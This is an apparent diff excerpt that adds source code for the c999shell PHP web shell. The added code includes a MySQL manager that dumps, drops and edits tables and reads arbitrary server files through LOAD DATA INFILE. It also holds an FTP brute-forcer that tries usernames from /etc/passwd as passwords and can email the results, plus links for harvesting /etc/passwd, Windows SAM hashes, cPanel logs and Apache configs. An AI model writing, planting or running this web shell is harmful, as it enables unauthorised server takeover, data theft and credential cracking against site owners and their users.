+     echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";
+     echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
+     $v = join (";",$dmptbls);
+     echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
+     if ($dump_file) {$tmp = $dump_file;}
+     else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
+     echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
+     echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
+     echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
+     echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty";
+     echo "</form>";
+    }
+    else
+    {
+     $diplay = TRUE;
+     $set = array();
+     $set["sock"] = $sql_sock;
+     $set["db"] = $sql_db;
+     $dump_out = "download";
+     $set["print"] = 0;
+     $set["nl2br"] = 0;
+     $set[""] = 0;
+     $set["file"] = $dump_file;
+     $set["add_drop"] = TRUE;
+     $set["onlytabs"] = array();
+     if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
+     $ret = mysql_dump($set);
+     if ($sql_dump_download)
+     {
+      @ob_clean();
+      header("Content-type: application/octet-stream");
+      header("Content-length: ".strlen($ret));
+      header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
+      echo $ret;
+      exit;
+     }
+     elseif ($sql_dump_savetofile)
+     {
+      $fp = fopen($sql_dump_file,"w");
+      if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
+      else
+      {
+       fwrite($fp,$ret);
+       fclose($fp);
+       echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";
+      }
+     }
+     else {echo "<b>Dump: nothing to do!</b>";}
+    }
+   }
+   if ($diplay)
+   {
+    if (!empty($sql_tbl))
+    {
+     if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
+     $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
+     $count_row = mysql_fetch_array($count);
+     mysql_free_result($count);
+     $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
+     $tbl_struct_fields = array();
+     while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
+     if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
+     if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
+     if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
+     if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
+     $perpage = $sql_tbl_le - $sql_tbl_ls;
+     if (!is_numeric($perpage)) {$perpage = 10;}
+     $numpages = $count_row[0]/$perpage;
+     $e = explode(" ",$sql_order);
+     if (count($e) == 2)
+     {
+      if ($e[0] == "d") {$asc_desc = "DESC";}
+      else {$asc_desc = "ASC";}
+      $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
+     }
+     else {$v = "";}
+     $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
+     $result = mysql_query($query) or print(mysql_smarterror());
+     echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";}
+     if ($sql_tbl_act == "insert")
+     {
+      if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
+      if (!empty($sql_tbl_insert_radio))
+      {
+
+      }
+      else
+      {
+       echo "<br><br><b>Inserting row into table:</b><br>";
+       if (!empty($sql_tbl_insert_q))
+       {
+        $sql_query = "SELECT * FROM `".$sql_tbl."`";
+        $sql_query .= " WHERE".$sql_tbl_insert_q;
+        $sql_query .= " LIMIT 1;";
+        $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
+        $values = mysql_fetch_assoc($result);
+        mysql_free_result($result);
+       }
+       else {$values = array();}
+       echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>";
+       foreach ($tbl_struct_fields as $field)
+       {
+        $name = $field["Field"];
+        if (empty($sql_tbl_insert_q)) {$v = "";}
+        echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
+        $i++;
+       }
+       echo "</table><br>";
+       echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
+       if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
+       echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>";
+      }
+     }
+     if ($sql_tbl_act == "browse")
+     {
+      $sql_tbl_ls = abs($sql_tbl_ls);
+      $sql_tbl_le = abs($sql_tbl_le);
+      echo "<hr size=\"1\" noshade>";
+      echo "<img src=\"".$surl."act=img&img=multipage\" height=\"12\" width=\"10\" alt=\"Pages\">&nbsp;";
+      $b = 0;
+      for($i=0;$i<$numpages;$i++)
+      {
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}
+       echo $i;
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
+       if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
+       else {echo "&nbsp;";}
+      }
+      if ($i == 0) {echo "empty";}
+      echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>";
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1>";
+      echo "<tr>";
+      echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>";
+      for ($i=0;$i<mysql_num_fields($result);$i++)
+      {
+       $v = mysql_field_name($result,$i);
+       if ($e[0] == "a") {$s = "d"; $m = "asc";}
+       else {$s = "a"; $m = "desc";}
+       echo "<td>";
+       if (empty($e[0])) {$e[0] = "a";}
+       if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";}
+       else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."act=img&img=sort_".$m."\" height=\"9\" width=\"14\" alt=\"".$m."\"></a>";}
+       echo "</td>";
+      }
+      echo "<td><font color=\"green\"><b>Action</b></font></td>";
+      echo "</tr>";
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
+      {
+       echo "<tr>";
+       $w = "";
+       $i = 0;
+       foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;}
+       if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}
+       echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
+       $i = 0;
+       foreach ($row as $k=>$v)
+       {
+        $v = htmlspecialchars($v);
+        if ($v == "") {$v = "<font color=\"green\">NULL</font>";}
+        echo "<td>".$v."</td>";
+        $i++;
+       }
+       echo "<td>";
+       echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Delete\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;";
+       echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\" height=\"14\" width=\"14\" border=\"0\"></a>&nbsp;";
+       echo "</td>";
+       echo "</tr>";
+      }
+      mysql_free_result($result);
+      echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
+      echo "<option value=\"\">With selected:</option>";
+      echo "<option value=\"deleterow\">Delete</option>";
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
+     }
+    }
+    else
+    {
+     $result = mysql_query("SHOW TABLE STATUS", $sql_sock);
+     if (!$result) {echo mysql_smarterror();}
+     else
+     {
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>";
+      $i = 0;
+      $tsize = $trows = 0;
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
+      {
+       $tsize += $row["Data_length"];
+       $trows += $row["Rows"];
+       $size = view_size($row["Data_length"]);
+       echo "<tr>";
+       echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>";
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>";
+       echo "<td>".$row["Rows"]."</td>";
+       echo "<td>".$row["Type"]."</td>";
+       echo "<td>".$row["Create_time"]."</td>";
+       echo "<td>".$row["Update_time"]."</td>";
+       echo "<td>".$size."</td>";
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" alt=\"Empty\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Drop\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><img src=\"".$surl."act=img&img=sql_button_insert\" alt=\"Insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;</td>";
+       echo "</tr>";
+       $i++;
+      }
+      echo "<tr bgcolor=\"000000\">";
+      echo "<td><center><b>»</b></center></td>";
+      echo "<td><center><b>".$i." table(s)</b></center></td>";
+      echo "<td><b>".$trows."</b></td>";
+      echo "<td>".$row[1]."</td>";
+      echo "<td>".$row[10]."</td>";
+      echo "<td>".$row[11]."</td>";
+      echo "<td><b>".view_size($tsize)."</b></td>";
+      echo "<td></td>";
+      echo "</tr>";
+      echo "</table><hr size=\"1\" noshade><p align=\"right\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
+      echo "<option value=\"\">With selected:</option>";
+      echo "<option value=\"tbldrop\">Drop</option>";
+      echo "<option value=\"tblempty\">Empty</option>";
+      echo "<option value=\"tbldump\">Dump</option>";
+      echo "<option value=\"tblcheck\">Check table</option>";
+      echo "<option value=\"tbloptimize\">Optimize table</option>";
+      echo "<option value=\"tblrepair\">Repair table</option>";
+      echo "<option value=\"tblanalyze\">Analyze table</option>";
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
+      mysql_free_result($result);
+     }
+    }
+   }
+   }
+  }
+  else
+  {
+   $acts = array("","newdb","serverstatus","servervars","processes","getfile");
+   if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php }
+   if (!empty($sql_act))
+   {
+    echo "<hr size=\"1\" noshade>";
+    if ($sql_act == "newdb")
+    {
+     echo "<b>";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
+     else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
+    }
+    if ($sql_act == "serverstatus")
+    {
+     $result = mysql_query("SHOW STATUS", $sql_sock);
+     echo "<center><b>Server-status variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
+     echo "</table></center>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "servervars")
+    {
+     $result = mysql_query("SHOW VARIABLES", $sql_sock);
+     echo "<center><b>Server variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "processes")
+    {
+     if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";}
+     $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
+     echo "<center><b>Processes:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "getfile")
+    {
+     $tmpdb = $sql_login."_tmpdb";
+     $select = mysql_select_db($tmpdb);
+     if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
+     if ($select)
+     {
+      $created = FALSE;
+      mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
+      mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
+      $result = mysql_query("SELECT * FROM tmp_file;");
+      if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";}
+      else
+      {
+       for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
+       $f = "";
+       while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);}
+       if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";}
+       else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}
+       mysql_free_result($result);
+       mysql_query("DROP TABLE tmp_file;");
+      }
+     }
+     mysql_drop_db($tmpdb); //comment it if you want to leave database
+    }
+   }
+  }
+ }
+ echo "</td></tr></table>";
+ if ($sql_sock)
+ {
+  $affected = @mysql_affected_rows($sql_sock);
+  if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;}
+  echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>";
+ }
+ echo "</table>";
+}
+if ($act == "mkdir")
+{
+ if ($mkdir != $d)
+ {
+  if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";}
+  elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}
+  echo "<br><br>";
+ }
+ $act = $dspact = "ls";
+}
+if ($act == "ftpquickbrute")
+{
+ echo "<b>Ftp Quick brute:</b><br>";
+ if (!win) {echo "This functions not work in Windows!<br><br>";}
+ else
+ {
+  function c999ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh)
+  {
+   if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));}
+   else {$TRUE = TRUE;}
+   if ($TRUE)
+   {
+    $sock = @ftp_connect($host,$port,$timeout);
+    if (@ftp_login($sock,$login,$pass))
+    {
+     echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
+     ob_flush();
+     return TRUE;
+    }
+   }
+  }
+  if (!empty($submit))
+  {
+   if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
+   $fp = fopen("/etc/passwd","r");
+   if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
+   else
+   {
+    if ($fqb_logging)
+    {
+     if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");}
+     else {$fqb_logfp = FALSE;}
+     $fqb_log = "FTP Quick Brute (called c999shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n";
+     if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+    }
+    ob_flush();
+    $i = $success = 0;
+    $ftpquick_st = getmicrotime();
+    while(!feof($fp))
+    {
+     $str = explode(":",fgets($fp,2048));
+     if (c999ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh))
+     {
+      echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>";
+      $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n";
+      if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+      $success++;
+      ob_flush();
+     }
+     if ($i > $fqb_lenght) {break;}
+     $i++;
+    }
+    if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";}
+    $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
+    echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>";
+    $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n";
+    if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+    if ($fqb_logemail) {@mail($fqb_logemail,"c999shell v. ".$shver." report",$fqb_log);}
+    fclose($fqb_logfp);
+   }
+  }
+  else
+  {
+   $logfile = $tmpdir_logs."c999sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log";
+   $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile);
+   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\"><br>Read first: <input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br>Logging?&nbsp;<input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked><br>Logging to file?&nbsp;<input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"><br>Logging to e-mail?&nbsp;<input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"><br><br><input type=submit name=submit value=\"Brute\"></form>";
+  }
+ }
+}
+if ($act == "d")
+{
+ if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";}
+ else
+ {
+  echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>";
+  if (!$win)
+  {
+   echo "<tr><td><b>Owner/Group</b></td><td> ";
+   $ow = posix_getpwuid(fileowner($d));
+   $gr = posix_getgrgid(filegroup($d));
+   $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
+  }
+  echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>";
+ }
+}
+if ($act == "phpinfo") {@ob_clean(); phpinfo(); c999shexit();}
+if ($act == "security")
+{
+ echo "<center><b>Server security information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>";
+ if (!$win)
+ {
+  if ($nixpasswd)
+  {
+   if ($nixpasswd == 1) {$nixpasswd = 0;}
+   echo "<b>*nix /etc/passwd:</b><br>";
+   if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;}
+   if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;}
+   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>";
+   $i = $nixpwd_s;
+   while ($i < $nixpwd_e)
+   {
+    $uid = posix_getpwuid($i);
+    if ($uid)
+    {
+     $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>";
+     echo join(":",$uid)."<br>";
+    }
+    $i++;
+   }
+  }
+  else {echo "<br><a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";}
+ }
+ else
+ {
+  $v = $_SERVER["WINDIR"]."\repair\sam";
+  if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";}
+  else {echo "<b><font color=green>You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ©.</font></b><br>";}
+ }
+ if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";}
+ if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";}
+ if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/usr/local/apache/conf")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
